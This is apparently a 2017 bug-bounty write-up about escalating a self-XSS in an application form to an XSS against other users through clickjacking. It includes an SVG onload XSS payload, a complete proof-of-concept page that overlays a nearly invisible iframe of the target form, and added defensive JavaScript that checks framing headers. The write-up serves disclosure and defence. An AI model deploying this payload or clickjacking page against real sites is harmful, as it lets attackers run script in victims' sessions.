Self XSS to Good XSS Clickjacking
Jul 20, 2017
Severity: High
Complexity: Easy
Weakness: Cross Site Scripting
- While testing one of the private programs on HackerOne, I landed on the following page.
- The page contains a form to submit the details of their application.
'>"/><svg/onload=prompt(document.cookie)>
As soon as I started entering the payload in this field, a pop-up appeared.
The form is vulnerable to self-XSS, but the plus point was that there was no X-Frame-Header or clickjacking protection, which makes the attack easier and converted it into a well-working XSS against other users.
Simple Demo POC:
<html>
<head><title>Poc</title></head>
<body>
<h1>Welcome to Click Games</h1>
<!-- Field pre-filled with the payload; clicking it copies the value to the clipboard -->
Message :<input id="copy-text" type="text" value='"/><svg/onload=prompt(document.domain)>"'>
<br><br><br>
<script>
document.getElementById("copy-text").onclick = function(){
  this.select();
  document.execCommand('copy');
  alert("Your Game Begins!")
}
</script>
<style>
/* Nearly transparent frame of the target form, positioned over the page */
iframe {
  width: 600px;
  height: 450px;
  position: absolute;
  top: 0; right: 10px;
  filter: alpha(opacity=50);
  opacity: 0.1;
}
</style>
<iframe src="https://sub.site.com/application/request/form"></iframe>
</body>
</html>
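The PoC only works because the form's response may be framed by another origin. The check below audits a response for the two controls that prevent that, the `X-Frame-Options` header and the CSP `frame-ancestors` directive. It is an added example, not code from the original post; the function names and the sample headers are constructed for illustration.

```javascript
// Added example, not the original post's code; header names are assumed lower-case.
// Collect the frame-ancestors source list of every enforced policy; several
// Content-Security-Policy headers arrive joined by commas.
function frameAncestorsLists(csp) {
  const lists = [];
  for (const policy of csp.split(',')) {
    for (const directive of policy.split(';')) {
      const [name, ...sources] = directive.trim().split(/\s+/);
      if (name.toLowerCase() === 'frame-ancestors') {
        lists.push(sources); // first occurrence in a policy wins
        break;
      }
    }
  }
  return lists;
}

// True when a source list lets any origin embed the page.
const isOpen = (sources) => sources.some((s) => s === '*' || /^https?:$/i.test(s));

// Can an arbitrary third-party page load this response in an <iframe>?
function framingVerdict(headers) {
  const lists = frameAncestorsLists(headers['content-security-policy'] || '');
  if (lists.length > 0) {
    // With frame-ancestors present, browsers ignore X-Frame-Options.
    return lists.every(isOpen)
      ? { framable: true, reason: 'frame-ancestors allows any origin' }
      : { framable: false, reason: 'frame-ancestors restricts embedding' };
  }
  const xfo = new Set((headers['x-frame-options'] || '').split(',')
    .map((v) => v.trim().toLowerCase()).filter(Boolean));
  const enforced = xfo.has('deny') || xfo.has('sameorigin');
  if (xfo.size > 1 && (enforced || xfo.has('allowall'))) {
    return { framable: false, reason: 'conflicting X-Frame-Options values are blocked' };
  }
  if (xfo.size === 1 && enforced) {
    return { framable: false, reason: 'X-Frame-Options: ' + [...xfo][0] };
  }
  return { framable: true, reason: xfo.size ? 'X-Frame-Options value not enforced' : 'no framing protection' };
}

// Constructed sample responses (not taken from the target in the post).
const samples = [
  {},
  { 'x-frame-options': 'ALLOW-FROM https://partner.example' },
  { 'x-frame-options': 'SAMEORIGIN', 'content-security-policy': "default-src 'self'; frame-ancestors *" },
  { 'content-security-policy': "frame-ancestors 'none'" },
];
for (const h of samples) console.log(JSON.stringify(h), framingVerdict(h));
```

Only response headers count here: browsers ignore `frame-ancestors` when it is delivered in a `<meta>` tag or in a report-only policy.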